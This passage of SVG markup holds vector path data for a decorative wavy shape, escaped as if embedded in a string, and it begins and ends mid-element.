2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path 